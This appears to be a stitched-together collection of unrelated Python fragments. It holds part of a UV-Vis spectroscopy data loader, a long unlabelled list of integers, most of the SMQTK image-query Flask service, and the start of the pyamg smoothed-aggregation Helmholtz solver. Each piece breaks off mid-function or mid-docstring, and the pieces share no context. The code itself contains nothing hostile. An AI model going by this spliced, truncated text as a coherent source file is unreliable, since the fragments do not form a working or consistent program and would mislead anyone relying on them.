### Sort dataframe by ascending time (could also sort spectral data) ###
dataframe.sort(axis=1, inplace=True) #axis1=columns
return dataframe
def from_gwu_chem_UVVIS(filelist, sortnames=False, shortname=True, cut_extension=False, name=''):
''' Format for comma delimited two column data from GWU chemistry's UVVis. These have no useful metadata
or dark data and so it is important that users either pass in a correctly sorted filelist. Once the
dataframe is created, on can do df=df.reindex(columns=[correct order]).
It uses read_csv() to and creates a list of dataframes. Afterwards, concat() merges these.
Kwds:
sortnames- Will attempt to autosort the filelist. Otherwise, order of files passed in is
directly used as columns.
shortname- | |
22197,
22198,
22200,
22201,
22202,
22203,
22204,
22205,
22206,
22207,
22208,
22209,
22212,
22214,
22216,
22217,
22218,
22219,
22220,
22221,
22222,
22223,
22224,
22225,
22226,
22227,
22228,
22229,
22231,
22232,
22234,
22235,
22236,
22237,
22238,
22239,
22240,
22241,
22242,
22243,
22244,
22245,
22246,
22247,
22248,
22249,
22250,
22251,
22252,
22253,
22254,
22255,
22256,
22257,
22259,
22260,
22261,
22262,
22263,
22264,
22265,
22266,
22267,
22268,
22269,
22270,
22271,
22272,
22274,
22275,
22276,
22277,
22278,
22279,
22280,
22281,
22282,
22283,
22284,
22285,
22286,
22287,
22288,
22289,
22290,
22291,
22292,
22293,
22294,
22295,
22296,
22297,
22298,
22299,
22300,
22301,
22302,
22303,
22304,
22305,
22306,
22307,
22308,
22309,
22310,
22311,
22312,
22313,
22314,
22315,
22317,
22318,
22319,
22320,
22321,
22322,
22324,
22325,
22326,
22327,
22328,
22329,
22330,
22331,
22332,
22333,
22334,
22335,
22336,
22337,
22338,
22339,
22340,
22342,
22343,
22344,
22345,
22347,
22348,
22349,
22350,
22351,
22352,
22353,
22354,
22355,
22356,
22357,
22358,
22359,
22360,
22361,
22362,
22363,
22364,
22365,
22366,
22367,
22368,
22369,
22370,
22371,
22372,
22373,
22374,
22375,
22376,
22377,
22378,
22379,
22380,
22381,
22382,
22383,
22384,
22385,
22388,
22389,
22390,
22392,
22393,
22394,
22395,
22396,
22397,
22398,
22399,
22400,
22401,
22402,
22403,
22404,
22405,
22406,
22407,
22408,
22409,
22410,
22411,
22412,
22413,
22414,
22416,
22417,
22418,
22419,
22420,
22421,
22422,
22423,
22424,
22425,
22426,
22427,
22428,
22429,
22430,
22431,
22432,
22433,
22434,
22435,
22436,
22437,
22438,
22439,
22440,
22441,
22442,
22443,
22444,
22445,
22446,
22447,
22448,
22449,
22450,
22451,
22452,
22456,
22457,
22458,
22459,
22460,
22461,
22462,
22463,
22464,
22465,
22466,
22467,
22468,
22469,
22470,
22471,
22472,
22473,
22476,
22477,
22478,
22479,
22480,
22481,
22482,
22483,
22484,
22487,
22488,
22489,
22490,
22491,
22492,
22493,
22494,
22495,
22496,
22497,
22498,
22499,
22500,
22501,
22502,
22503,
22504,
22505,
22506,
22507,
22508,
22509,
22510,
22511,
22512,
22513,
22514,
22515,
22516,
22517,
22518,
22519,
22520,
22521,
22522,
22523,
22524,
22525,
22526,
22527,
22528,
22529,
22530,
22531,
22532,
22533,
22534,
22535,
22536,
22537,
22538,
22539,
22540,
22541,
22542,
22543,
22544,
22545,
22547,
22548,
22549,
22550,
22551,
22552,
22553,
22554,
22555,
22556,
22557,
22558,
22559,
22560,
22561,
22562,
22563,
22565,
22566,
22567,
22568,
22570,
22571,
22572,
22573,
22574,
22575,
22576,
22577,
22578,
22579,
22580,
22583,
22589,
22590,
22591,
22592,
22593,
22594,
22595,
22597,
22598,
22599,
22600,
22601,
22602,
22603,
22604,
22605,
22606,
22607,
22608,
22609,
22610,
22611,
22612,
22613,
22614,
22615,
22616,
22617,
22618,
22620,
22621,
22622,
22623,
22624,
22627,
22628,
22629,
22630,
22631,
22632,
22633,
22634,
22635,
22636,
22637,
22638,
22639,
22640,
22641,
22642,
22644,
22645,
22646,
22647,
22648,
22649,
22650,
22651,
22652,
22653,
22654,
22655,
22656,
22657,
22658,
22659,
22660,
22661,
22662,
22663,
22664,
22665,
22666,
22667,
22668,
22669,
22670,
22671,
22672,
22673,
22674,
22675,
22676,
22677,
22678,
22679,
22680,
22681,
22682,
22683,
22688,
22689,
22690,
22691,
22693,
22699,
22700,
22701,
22702,
22706,
22707,
22708,
22710,
22711,
22712,
22713,
22714,
22715,
22716,
22717,
22718,
22719,
22720,
22721,
22722,
22723,
22725,
22726,
22727,
22728,
22729,
22730,
22731,
22732,
22733,
22734,
22735,
22736,
22737,
22739,
22740,
22741,
22742,
22743,
22744,
22745,
22746,
22747,
22748,
22749,
22750,
22752,
22753,
22754,
22755,
22756,
22757,
22758,
22759,
22760,
22761,
22762,
22763,
22764,
22766,
22767,
22768,
22769,
22770,
22771,
22772,
22773,
22774,
22775,
22776,
22777,
22778,
22779,
22783,
22784,
22785,
22786,
22787,
22788,
22789,
22790,
22791,
22792,
22793,
22794,
22795,
22796,
22797,
22798,
22799,
22800,
22801,
22802,
22803,
22804,
22806,
22807,
22808,
22809,
22810,
22811,
22812,
22813,
22815,
22816,
22818,
22819,
22820,
22821,
22822,
22823,
22824,
22825,
22826,
22827,
22828,
22829,
22830,
22831,
22832,
22833,
22834,
22835,
22836,
22837,
22838,
22839,
22840,
22841,
22842,
22843,
22844,
22845,
22846,
22847,
22848,
22849,
22850,
22851,
22852,
22853,
22854,
22855,
22856,
22857,
22858,
22859,
22860,
22861,
22862,
22863,
22864,
22865,
22866,
22867,
22868,
22869,
22870,
22871,
22872,
22873,
22874,
22875,
22876,
22877,
22878,
22879,
22880,
22881,
22882,
22883,
22884,
22885,
22886,
22887,
22888,
22889,
22890,
22891,
22892,
22893,
22894,
22895,
22896,
22897,
22900,
22901,
22902,
22903,
22904,
22905,
22906,
22907,
22908,
22909,
22910,
22911,
22912,
22913,
22914,
22915,
22916,
22917,
22918,
22919,
22920,
22921,
22922,
22923,
22924,
22925,
22926,
22927,
22930,
22932,
22934,
22935,
22936,
22937,
22938,
22939,
22940,
22941,
22942,
22943,
22944,
22945,
22946,
22947,
22948,
22949,
22950,
22951,
22952,
22953,
22954,
22955,
22956,
22957,
22958,
22959,
22960,
22961,
22962,
22963,
22964,
22965,
22966,
22967,
22968,
22969,
22970,
22971,
22972,
22973,
22974,
22975,
22976,
22977,
22978,
22979,
22980,
22981,
22982,
22983,
22984,
22985,
22986,
22987,
22988,
22990,
22991,
22992,
22993,
22994,
22995,
22996,
22997,
22998,
22999,
23000,
23001,
23002,
23003,
23004,
23005,
23006,
23007,
23008,
23009,
23010,
23011,
23012,
23013,
23014,
23015,
23016,
23017,
23018,
23019,
23020,
23021,
23022,
23023,
23024,
23025,
23027,
23028,
23029,
23030,
23031,
23032,
23033,
23035,
23036,
23037,
23038,
23039,
23040,
23041,
23042,
23043,
23044,
23045,
23046,
23047,
23048,
23049,
23050,
23051,
23053,
23054,
23055,
23056,
23057,
23059,
23060,
23061,
23062,
23063,
23064,
23065,
23066,
23067,
23068,
23069,
23070,
23071,
23072,
23073,
23075,
23077,
23078,
23079,
23081,
23082,
23083,
23084,
23085,
23087,
23088,
23089,
23090,
23091,
23092,
23093,
23094,
23095,
23096,
23097,
23098,
23099,
23100,
23101,
23103,
23104,
23105,
23106,
23107,
23108,
23109,
23110,
23111,
23112,
23113,
23114,
23115,
23116,
23117,
23118,
23119,
23120,
23121,
23122,
23123,
23124,
23125,
23126,
23127,
23128,
23129,
23130,
23131,
23132,
23133,
23134,
23135,
23136,
23137,
23138,
23139,
23140,
23141,
23142,
23143,
23144,
23145,
23146,
23147,
23148,
23149,
23150,
23151,
23152,
23153,
23154,
23155,
23156,
23160,
23161,
23165,
23166,
23167,
23168,
23169,
23170,
23171,
23173,
23177,
23178,
23179,
23180,
23181,
23182,
23183,
23184,
23191,
23192,
23194,
23195,
23196,
23197,
23198,
23199,
23200,
23201,
23203,
23205,
23206,
23207,
23211,
23217,
23218,
23219,
23220,
23221,
23226,
23228,
23237,
23238,
23239,
23242,
23243,
23244,
23246,
23247,
23248,
23249,
23250,
23251,
23252,
23253,
23254,
23255,
23256,
23257,
23258,
23259,
23260,
23261,
23262,
23263,
23264,
23265,
23266,
23267,
23268,
23269,
23270,
23272,
23273,
23274,
23275,
23276,
23277,
23278,
23279,
23280,
23281,
23282,
23283,
23284,
23285,
23286,
23287,
23288,
23289,
23290,
23291,
23292,
23293,
23294,
23295,
23296,
23297,
23298,
23299,
23300,
23301,
23302,
23303,
23304,
23305,
23306,
23307,
23308,
23309,
23310,
23311,
23312,
23313,
23314,
23315,
23316,
23317,
23318,
23319,
23320,
23321,
23322,
23323,
23324,
23326,
23327,
23329,
23331,
23332,
23333,
23334,
23336,
23337,
23338,
23339,
23343,
23344,
23345,
23346,
23347,
23348,
23353,
23354,
23355,
23358,
23361,
23364,
23366,
23367,
23370,
23371,
23372,
23373,
23375,
23376,
23377,
23379,
23380,
23381,
23383,
23384,
23385,
23386,
23387,
23389,
23390,
23391,
23392,
23393,
23394,
23395,
23396,
23397,
23398,
23399,
23400,
23401,
23402,
23403,
23404,
23405,
23406,
23407,
23408,
23409,
23410,
23411,
23412,
23413,
23414,
23415,
23417,
23423,
23424,
23425,
23426,
23427,
23429,
23430,
23431,
23435,
23436,
23437,
23438,
23439,
23440,
23441,
23442,
23444,
23445,
23446,
23447,
23448,
23449,
23451,
23452,
23453,
23454,
23455,
23456,
23458,
23459,
23461,
23462,
23464,
23465,
23466,
23467,
23468,
23469,
23473,
23474,
23475,
23476,
23477,
23478,
23479,
23480,
23482,
23483,
23484,
23485,
23486,
23487,
23488,
23489,
23490,
23491,
23492,
23493,
23494,
23495,
23497,
23498,
23499,
23500,
23501,
23502,
23503,
23504,
23505,
23506,
23507,
23508,
23509,
23510,
23511,
23512,
23513,
23514,
23515,
23516,
23517,
23518,
23519,
23520,
23521,
23522,
23523,
23524,
23525,
23526,
23527,
23528,
23529,
23530,
23531,
23532,
23533,
23534,
23535,
23536,
23537,
23538,
23539,
23540,
23541,
23542,
23543,
23544,
23545,
23546,
23547,
23548,
23549,
23550,
23551,
23552,
23553,
23554,
23555,
23556,
23557,
23558,
23559,
23560,
23561,
23562,
23563,
23564,
23565,
23566,
23568,
23569,
23570,
23571,
23572,
23573,
23574,
23575,
23576,
23577,
23578,
23579,
23580,
23584,
23585,
23586,
23587,
23588,
23589,
23590,
23591,
23592,
23593,
23594,
23595,
23596,
23597,
23598,
23599,
23600,
23601,
23602,
23603,
23604,
23605,
23606,
23607,
23608,
23609,
23610,
23611,
23612,
23613,
23614,
23615,
23617,
23618,
23619,
23620,
23621,
23622,
23623,
23624,
23625,
23626,
23627,
23628,
23629,
23630,
23631,
23632,
23633,
23634,
23635,
23636,
23637,
23638,
23639,
23642,
23643,
23644,
23645,
23646,
23654,
23657,
23658,
23659,
| |
<filename>python/smqtk/web/iqr_service/iqr_server.py
import base64
import binascii
import collections
import collections.abc
import json
import multiprocessing
import time
import traceback
import uuid

import flask
# import smqtk.algorithms
from smqtk.algorithms import (
get_classifier_impls,
get_descriptor_generator_impls,
get_nn_index_impls,
get_relevancy_index_impls,
SupervisedClassifier,
)
from smqtk.iqr import (
iqr_controller,
iqr_session,
)
from smqtk.representation import (
ClassificationElementFactory,
DescriptorElementFactory,
get_descriptor_index_impls,
)
from smqtk.representation.data_element.memory_element import DataMemoryElement
from smqtk.utils import (
merge_dict,
plugin,
)
from smqtk.web import SmqtkWebApp
def new_uuid():
return str(uuid.uuid1(clock_seq=int(time.time() * 1000000)))\
.replace('-', '')
def make_response_json(message, **params):
r = {
"message": message,
"time": {
"unix": time.time(),
"utc": time.asctime(time.gmtime()),
}
}
merge_dict(r, params)
return flask.jsonify(**r)
# Get expected JSON decode exception.
#
# Flask can use one of two potential JSON parsing libraries: simplejson or
# json. simplejson has a specific exception for decoding errors while json
# just raises a ValueError.
#
# noinspection PyProtectedMember
if hasattr(flask.json._json, 'JSONDecodeError'):
# noinspection PyProtectedMember
JSON_DECODE_EXCEPTION = getattr(flask.json._json, 'JSONDecodeError')
else:
JSON_DECODE_EXCEPTION = ValueError
def parse_hashable_json_list(json_str):
"""
Parse and check input string, looking for a JSON list of hashable values.
:param json_str: String to parse and check.
:type json_str: str
:raises ValueError: Expected value check failed.
:return: List of hashable-type values.
:rtype: list[collections.Hashable]
"""
try:
v_list = flask.json.loads(json_str)
except JSON_DECODE_EXCEPTION as ex:
raise ValueError("JSON parsing error: %s" % str(ex))
if not isinstance(v_list, list):
raise ValueError("JSON provided is not a list.")
# Should not be an empty list.
elif not v_list:
raise ValueError("JSON list is empty.")
# Contents of list should be numeric or string values.
elif not all(isinstance(el, collections.Hashable)
for el in v_list):
raise ValueError("Not all JSON list parts were hashable values.")
return v_list
class IqrService (SmqtkWebApp):
"""
Configuration Notes
-------------------
``descriptor_index`` will currently be configured twice: once for the
global index and once for the nearest neighbors index. These will probably
be the set to the same index. In more detail, the global descriptor index
    is used when the "refine" endpoint is given descriptor UUIDs.
"""
@classmethod
def is_usable(cls):
return True
@classmethod
def get_default_config(cls):
c = super(IqrService, cls).get_default_config()
c_rel_index = plugin.make_config(
get_relevancy_index_impls()
)
merge_dict(c_rel_index, iqr_session.DFLT_REL_INDEX_CONFIG)
merge_dict(c, {
"iqr_service": {
"session_control": {
"positive_seed_neighbors": 500,
"session_expiration": {
"enabled": False,
"check_interval_seconds": 30,
"session_timeout": 3600,
}
},
"plugin_notes": {
"relevancy_index_config":
"The relevancy index config provided should not have "
"persistent storage configured as it will be used in "
"such a way that instances are created, built and "
"destroyed often.",
"descriptor_factory":
"What descriptor element factory to use when asked to "
"compute a descriptor on data.",
"descriptor_generator":
"Descriptor generation algorithm to use when "
"requested to describe data.",
"descriptor_index":
"This is the index from which given positive and "
"negative example descriptors are retrieved from. "
"Not used for nearest neighbor querying. "
"This index must contain all descriptors that could "
"possibly be used as positive/negative examples and "
"updated accordingly.",
"neighbor_index":
"This is the neighbor index to pull initial near-"
"positive descriptors from.",
"classifier_config":
"The configuration to use for training and using "
"classifiers for the /classifier endpoint. "
"When configuring a classifier for use, don't fill "
"out model persistence values as many classifiers "
"may be created and thrown away during this service's "
"operation.",
"classification_factory":
"Selection of the backend in which classifications "
"are stored. The in-memory version is recommended "
"because normal caching mechanisms will not account "
"for the variety of classifiers that can potentially "
"be created via this utility.",
},
"plugins": {
"relevancy_index_config": c_rel_index,
"descriptor_factory":
DescriptorElementFactory.get_default_config(),
"descriptor_generator": plugin.make_config(
get_descriptor_generator_impls()
),
"descriptor_index": plugin.make_config(
get_descriptor_index_impls()
),
"neighbor_index":
plugin.make_config(get_nn_index_impls()),
"classifier_config":
plugin.make_config(get_classifier_impls()),
"classification_factory":
ClassificationElementFactory.get_default_config(),
},
}
})
return c
def __init__(self, json_config):
super(IqrService, self).__init__(json_config)
sc_config = json_config['iqr_service']['session_control']
# Initialize from config
self.positive_seed_neighbors = sc_config['positive_seed_neighbors']
self.classifier_config = \
json_config['iqr_service']['plugins']['classifier_config']
self.classification_factory = \
ClassificationElementFactory.from_config(
json_config['iqr_service']['plugins']['classification_factory']
)
self.descriptor_factory = DescriptorElementFactory.from_config(
json_config['iqr_service']['plugins']['descriptor_factory']
)
#: :type: smqtk.algorithms.DescriptorGenerator
self.descriptor_generator = plugin.from_plugin_config(
json_config['iqr_service']['plugins']['descriptor_generator'],
get_descriptor_generator_impls(),
)
#: :type: smqtk.representation.DescriptorIndex
self.descriptor_index = plugin.from_plugin_config(
json_config['iqr_service']['plugins']['descriptor_index'],
get_descriptor_index_impls(),
)
#: :type: smqtk.algorithms.NearestNeighborsIndex
self.neighbor_index = plugin.from_plugin_config(
json_config['iqr_service']['plugins']['neighbor_index'],
get_nn_index_impls(),
)
self.neighbor_index_lock = multiprocessing.RLock()
self.rel_index_config = \
json_config['iqr_service']['plugins']['relevancy_index_config']
# Record of trained classifiers for a session. Session classifier
# modifications locked under the parent session's global lock.
#: :type: dict[collections.Hashable, SupervisedClassifier | None]
self.session_classifiers = {}
# Control for knowing when a new classifier should be trained for a
# session (True == train new classifier). Modification for specific
# sessions under parent session's lock.
#: :type: dict[collections.Hashable, bool]
self.session_classifier_dirty = {}
def session_expire_callback(session):
"""
:type session: smqtk.iqr.IqrSession
"""
with session:
self._log.debug("Removing session %s classifier", session.uuid)
del self.session_classifiers[session.uuid]
del self.session_classifier_dirty[session.uuid]
self.controller = iqr_controller.IqrController(
sc_config['session_expiration']['enabled'],
sc_config['session_expiration']['check_interval_seconds'],
session_expire_callback
)
self.session_timeout = \
sc_config['session_expiration']['session_timeout']
self.add_routes()
def add_routes(self):
"""
Setup Flask URL rules.
"""
self.add_url_rule('/is_ready',
view_func=self.is_ready,
methods=['GET'])
self.add_url_rule('/add_descriptor_from_data',
view_func=self.add_descriptor_from_data,
methods=['POST'])
# TODO: Potentially other add_descriptor_from_* variants that expect
# other forms of input besides base64, like arbitrary URIs (to
# use from_uri factory function).
self.add_url_rule('/nn_index',
view_func=self.get_nn_index_status,
methods=['GET'])
self.add_url_rule('/nn_index',
view_func=self.update_nn_index,
methods=['POST'])
self.add_url_rule('/nn_index',
view_func=self.remove_from_nn_index,
methods=['DELETE'])
self.add_url_rule('/data_nearest_neighbors',
view_func=self.data_nearest_neighbors,
methods=['POST'])
self.add_url_rule('/uid_nearest_neighbors',
view_func=self.uid_nearest_neighbors,
methods=['POST'])
self.add_url_rule('/session_ids',
view_func=self.get_sessions_ids,
methods=['GET'])
self.add_url_rule('/session',
view_func=self.get_session_info,
methods=['GET'])
self.add_url_rule('/session',
view_func=self.init_session,
methods=['POST'])
self.add_url_rule('/session',
view_func=self.reset_session,
methods=['PUT'])
self.add_url_rule('/session',
view_func=self.clean_session,
methods=['DELETE'])
self.add_url_rule('/add_external_pos',
view_func=self.add_external_positive,
methods=['POST'])
self.add_url_rule('/add_external_neg',
view_func=self.add_external_negative,
methods=['POST'])
self.add_url_rule('/adjudicate',
view_func=self.get_adjudication,
methods=['GET'])
self.add_url_rule('/adjudicate',
view_func=self.adjudicate,
methods=['POST'])
self.add_url_rule('/initialize',
view_func=self.initialize,
methods=['POST'])
self.add_url_rule('/refine',
view_func=self.refine,
methods=['POST'])
self.add_url_rule('/num_results',
view_func=self.num_results,
methods=['GET'])
self.add_url_rule('/get_results',
view_func=self.get_results,
methods=['GET'])
self.add_url_rule('/classify',
view_func=self.classify,
methods=['GET'])
self.add_url_rule('/state',
view_func=self.get_iqr_state,
methods=['GET'])
self.add_url_rule('/state',
view_func=self.set_iqr_state,
methods=['PUT'])
def describe_base64_data(self, b64, content_type):
"""
Compute and return the descriptor element for the given base64 data.
The given data bytes are not retained.
:param b64: Base64 data string.
:type b64: str
:param content_type: Data content type.
:type content_type: str
:raises TypeError: Failed to parse base64 data.
:return: Computed descriptor element.
:rtype: smqtk.representation.DescriptorElement
"""
de = DataMemoryElement.from_base64(b64, content_type)
return self.descriptor_generator.compute_descriptor(
de, self.descriptor_factory
)
# GET /is_ready
# noinspection PyMethodMayBeStatic
def is_ready(self):
"""
Simple function that returns True, indicating that the server is
active.
"""
return make_response_json("Yes, I'm alive."), 200
# POST /add_descriptor_from_data
def add_descriptor_from_data(self):
"""
Add the description of the given base64 data with content type to the
descriptor set.
Accept base64 data (with content type), describe it via the configured
descriptor generator and add the resulting descriptor element to the
configured descriptor index.
Form Arguments:
data_b64
Base64-encoded input binary data to describe via
DescriptorGenerator. This must be of a content type accepted
by the configured DescriptorGenerator.
content_type
Input data content mimetype string.
JSON return object:
uid
UID of the descriptor element generated from input data
description. This should be equivalent to the SHA1 checksum of
the input data.
size
New size (integer) of the descriptor set that has been updated
(NOT the same as the nearest-neighbor index).
"""
data_b64 = flask.request.form.get('data_b64', None)
content_type = flask.request.form.get('content_type', None)
if not data_b64:
return make_response_json("No or empty base64 data provided."), 400
if not content_type:
return make_response_json("No data mimetype provided."), 400
try:
descriptor = self.describe_base64_data(data_b64, content_type)
except (TypeError, binascii.Error) as e:
if str(e) == "Incorrect padding":
return make_response_json("Failed to parse base64 data."), 400
# In case some other exception is raised, actually a server error.
raise
# Concurrent updating of descriptor set should be handled by underlying
# implementation.
self.descriptor_index.add_descriptor(descriptor)
return make_response_json("Success",
uid=descriptor.uuid(),
size=self.descriptor_index.count()), 201
# GET /nn_index
def get_nn_index_status(self):
"""
Get status/state information about the nearest-neighbor index.
Status code 200 on success, JSON return object: {
...,
// Size of the nearest-neighbor index.
index_size=<int>
}
"""
with self.neighbor_index_lock:
return (
make_response_json("Success",
index_size=self.neighbor_index.count()),
200
)
# POST /nn_index
def update_nn_index(self):
"""
Tell the configured nearest-neighbor-index instance to update with the
descriptors associated with the provided list of UIDs.
This is a critical operation on the index so this method can only be
invoked once at a time (other concurrent will block until previous
calls have finished).
Form Arguments:
descriptor_uids
JSON list of UID strings. If one or more UIDs do not match
descriptors in our current descriptor-set we return an error
message.
JSON return object:
message
Success string
descriptor_uids
List of UIDs the neighbor index was updated with. This should
be congruent with the list provided.
index_size
New size of the nearest-neighbors index.
"""
descr_uid_str = flask.request.form.get('descriptor_uids', None)
if not descr_uid_str: # empty string or None
return make_response_json("No descriptor UID JSON provided."), 400
# Load and check JSON input.
try:
descr_uid_list = parse_hashable_json_list(descr_uid_str)
except ValueError as ex:
return make_response_json("%s" % str(ex)), 400
with self.neighbor_index_lock:
try:
# | |
"""Support for aggregation-based AMG"""
__docformat__ = "restructuredtext en"
import numpy
import scipy
from scipy.sparse import isspmatrix_csr, isspmatrix_bsr
from pyamg.multilevel import multilevel_solver
from pyamg.util.utils import relaxation_as_linear_operator
from pyamg.relaxation.smoothing import change_smoothers
from pyamg.strength import symmetric_strength_of_connection, evolution_strength_of_connection, \
distance_strength_of_connection
from pyamg.aggregation.aggregation import extend_hierarchy, preprocess_Bimprove, \
preprocess_str_or_agg, preprocess_smooth
from pyamg.aggregation.aggregate import standard_aggregation, lloyd_aggregation
from pyamg.aggregation.tentative import fit_candidates
from pyamg.aggregation.smooth import jacobi_prolongation_smoother, \
richardson_prolongation_smoother, energy_prolongation_smoother
__all__ = ['smoothed_aggregation_helmholtz_solver', 'planewaves']
def planewaves(X, Y, omega=1.0, angles=(0.0,)):
    """
    Generate plane waves for use in SA applied to Helmholtz problems

    Parameters
    ----------
    X,Y : {array}
        Coordinate vectors
    omega : {float}
        Helmholtz wave number, Laplace(u) + omega^2 u = f
    angles : {iterable}
        Angles in [0, 2 pi] from which to generate planewaves

    Returns
    -------
    Complex array of shape (max(X.shape), 2*len(angles)); each angle
    contributes two columns: the real and imaginary parts of
    exp(1j*omega*(cos(angle)*X + sin(angle)*Y)).
    """
    # Immutable default (the old [0.0] default was a shared mutable object);
    # materialize so generators/tuples are handled uniformly.
    angles = list(angles)
    L = 2 * len(angles)
    dimen = max(X.shape)
    # Waves are filled row-wise and transposed at the end so the returned
    # array is written row-wise for efficiency.
    W = numpy.zeros((L, dimen), dtype=complex)
    if L == 0:
        return W.T.copy()

    X = numpy.ravel(X)
    Y = numpy.ravel(Y)
    for i, angle in enumerate(angles):
        # Wave vector for this propagation direction.
        kx = omega * numpy.cos(angle)
        ky = omega * numpy.sin(angle)
        wave = numpy.exp(1.0j * (kx * X + ky * Y))
        W[2 * i, :] = numpy.real(wave)
        W[2 * i + 1, :] = numpy.imag(wave)
    return W.T.copy()
def preprocess_planewaves(planewaves, max_levels):
    """
    Helper for smoothed_aggregation_helmholtz_solver: extend planewaves to a
    length ``max_levels`` list, repeating the final element if necessary.

    ``None`` is normalized to ``[None]`` first.  Raises ValueError when the
    argument is neither None nor a list.
    """
    if planewaves is None:  # identity test; `== None` invokes __eq__ and can misfire
        planewaves = [None]
    if not isinstance(planewaves, list):
        raise ValueError("planewaves must be a list")
    if len(planewaves) < max_levels:
        # Pad in place with the last entry (callers may rely on the
        # historical in-place extension as well as the return value).
        planewaves.extend([planewaves[-1]] * (max_levels - len(planewaves)))
    return planewaves
def unpack_arg(v):
    """Split a (name, kwargs) tuple; a bare value gets empty kwargs."""
    if isinstance(v, tuple):
        name, kwargs = v[0], v[1]
    else:
        name, kwargs = v, {}
    return name, kwargs
def smoothed_aggregation_helmholtz_solver(A, planewaves, use_constant=(True, {'last_level':0}),
symmetry='symmetric', strength='symmetric', aggregate='standard',
smooth=('energy', {'krylov': 'gmres'}),
presmoother=('gauss_seidel_nr',{'sweep':'symmetric'}),
postsmoother=('gauss_seidel_nr',{'sweep':'symmetric'}),
Bimprove='default', max_levels = 10, max_coarse = 100, **kwargs):
"""
Create a multilevel solver using Smoothed Aggregation (SA) for a 2D Helmholtz operator
Parameters
----------
A : {csr_matrix, bsr_matrix}
Sparse NxN matrix in CSR or BSR format
planewaves : { list }
[pw_0, pw_1, ..., pw_n], where the k-th tuple pw_k is of the form (fn,
args). fn is a callable and args is a dictionary of arguments for fn.
This k-th tuple is used to define any new planewaves (i.e., new coarse
grid basis functions) to be appended to the existing B_k at that level.
The function fn must return functions defined on the finest level,
i.e., a collection of vector(s) of length A.shape[0]. These vectors
are then restricted to the appropriate level, where they enrich the
coarse space.
Instead of a tuple, None can be used to stipulate no introduction
of planewaves at that level. If len(planewaves) < max_levels, the
last entry is used to define coarser level planewaves.
use_constant : {tuple}
Tuple of the form (bool, {'last_level':int}). The boolean denotes
whether to introduce the constant in B at level 0. 'last_level' denotes
the final level to use the constant in B. That is, if 'last_level' is 1,
then the vector in B corresponding to the constant on level 0 is dropped
from B at level 2.
This is important, because using constant based interpolation beyond
the Nyquist rate will result in poor solver performance.
symmetry : {string}
'symmetric' refers to both real and complex symmetric
'hermitian' refers to both complex Hermitian and real Hermitian
'nonsymmetric' i.e. nonsymmetric in a hermitian sense
Note that for the strictly real case, symmetric and hermitian are the same
Note that this flag does not denote definiteness of the operator.
strength : ['symmetric', 'classical', 'evolution', ('predefined', {'C' : csr_matrix}), None]
Method used to determine the strength of connection between unknowns of
the linear system. Method-specific parameters may be passed in using a
tuple, e.g. strength=('symmetric',{'theta' : 0.25 }). If strength=None,
all nonzero entries of the matrix are considered strong.
See notes below for varying this parameter on a per level basis. Also,
see notes below for using a predefined strength matrix on each level.
aggregate : ['standard', 'lloyd', 'naive', ('predefined', {'AggOp' : csr_matrix})]
Method used to aggregate nodes. See notes below for varying this
parameter on a per level basis. Also, see notes below for using a
predefined aggregation on each level.
smooth : ['jacobi', 'richardson', 'energy', None]
Method used to smooth the tentative prolongator. Method-specific
parameters may be passed in using a tuple, e.g. smooth=
('jacobi',{'filter' : True }). See notes below for varying this
parameter on a per level basis.
presmoother : {tuple, string, list} : default ('block_gauss_seidel', {'sweep':'symmetric'})
Defines the presmoother for the multilevel cycling. The default block
Gauss-Seidel option defaults to point-wise Gauss-Seidel, if the matrix
is CSR or is a BSR matrix with blocksize of 1. See notes below for
varying this parameter on a per level basis.
postsmoother : {tuple, string, list}
Same as presmoother, except defines the postsmoother.
Bimprove : {list} : default [('block_gauss_seidel', {'sweep':'symmetric'}), None]
The ith entry defines the method used to improve the candidates B on
level i. If the list is shorter than max_levels, then the last entry
will define the method for all levels lower.
The list elements are relaxation descriptors of the form used for
presmoother and postsmoother. A value of None implies no action on B.
max_levels : {integer} : default 10
Maximum number of levels to be used in the multilevel solver.
max_coarse : {integer} : default 500
Maximum number of variables permitted on the coarse grid.
Other Parameters
----------------
coarse_solver : ['splu','lu', ... ]
Solver used at the coarsest level of the MG hierarchy
Returns
-------
ml : multilevel_solver
Multigrid hierarchy of matrices and prolongation operators
See Also
--------
multilevel_solver, smoothed_aggregation_solver
Notes
-----
- The additional parameters are passed through as arguments to
multilevel_solver. Refer to pyamg.multilevel_solver for additional
documentation.
- The parameters smooth, strength, aggregate, presmoother, postsmoother can
be varied on a per level basis. For different methods on different
levels, use a list as input so that the ith entry defines the method at
the ith level. If there are more levels in the hierarchy than list
entries, the last entry will define the method for all levels lower.
Examples are:
smooth=[('jacobi', {'omega':1.0}), None, 'jacobi']
presmoother=[('block_gauss_seidel', {'sweep':symmetric}), 'sor']
aggregate=['standard', 'naive']
strength=[('symmetric', {'theta':0.25}), ('symmetric',{'theta':0.08})]
- Predefined strength of connection and aggregation schemes can be
specified. These options are best used together, but aggregation can be
predefined while strength of connection is not.
For predefined strength of connection, use a list consisting of tuples of
the form ('predefined', {'C' : C0}), where C0 is a csr_matrix and each
degree-of-freedom in C0 represents a supernode. For instance to
predefine a three-level hierarchy, use [('predefined', {'C' : C0}),
('predefined', {'C' : C1}) ].
Similarly for predefined aggregation, use a list of tuples. For instance
to predefine a three-level hierarchy, use [('predefined', {'AggOp' :
Agg0}), ('predefined', {'AggOp' : Agg1}) ], where the dimensions of A,
Agg0 and Agg1 are compatible, i.e. Agg0.shape[1] == A.shape[0] and
Agg1.shape[1] == Agg0.shape[0]. Each AggOp is a csr_matrix.
Examples
--------
>>> from pyamg import smoothed_aggregation_helmholtz_solver, poisson
>>> from scipy.sparse.linalg import cg
>>> from scipy import rand
>>> A = poisson((100,100), format='csr') # matrix
>>> b = rand(A.shape[0]) # random RHS
>>> ml = smoothed_aggregation_solver(A) # AMG solver
>>> M = ml.aspreconditioner(cycle='V') # preconditioner
>>> x,info = cg(A, b, tol=1e-8, maxiter=30, M=M) # solve with CG
References
----------
.. [1] <NAME> and <NAME>. Smoothed Aggregation for Helmholtz
Problems. Numerical Linear Algebra with Applications. pp. 361--386. 17
(2010).
"""
if not (isspmatrix_csr(A) or isspmatrix_bsr(A)):
raise TypeError('argument A must have type csr_matrix or bsr_matrix')
A = A.asfptype()
if (symmetry != 'symmetric') and (symmetry != 'hermitian') and (symmetry != 'nonsymmetric'):
raise ValueError('expected \'symmetric\', \'nonsymmetric\' or \'hermitian\' for the symmetry parameter ')
A.symmetry = symmetry
if A.shape[0] != A.shape[1]:
raise ValueError('expected square matrix')
##
# Preprocess and extend planewaves to length max_levels
